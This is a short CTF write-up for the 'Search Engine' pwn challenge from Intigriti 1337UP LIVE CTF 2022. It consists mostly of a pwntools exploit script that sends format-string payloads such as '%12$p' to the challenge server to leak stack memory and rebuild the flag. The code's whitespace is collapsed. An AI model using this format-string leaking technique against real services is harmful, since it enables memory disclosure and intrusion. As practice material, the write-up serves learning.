Writeup for Search Engine (Pwn) - Intigriti 1337UP LIVE CTF (2022) 💜
Video Walkthrough
Challenge Description
In an attempt to block third party software, we've been using our very own search engine! It doesn't yet have every feature, but at least it's very secure!
Solution
from pwn import*context.log_level ='info'flag =''# Let's fuzz x valuesfor i inrange(12, 16):try:# Connect to server io =remote('searchengine.ctf.intigriti.io', 1337, level='warn')# Format the counter# e.g. %i$p will attempt to print [i]th pointer (or string/hex/char/int) io.sendline('%{}$p'.format(i).encode())# Receive the response (leaked address followed by '.' in this case) io.recvuntil(b'No result found. You searched for - ') result = io.recv()ifnot b'nil'in result:print(str(i) +': '+str(result))try:# Decode, reverse endianess and print decoded =unhex(result.strip().decode()[2:]) reversed_hex = decoded[::-1]print(str(reversed_hex))# Build up flag flag += reversed_hex.decode()exceptBaseException:pass io.close()exceptEOFError: io.close()# Print and closeinfo(flag)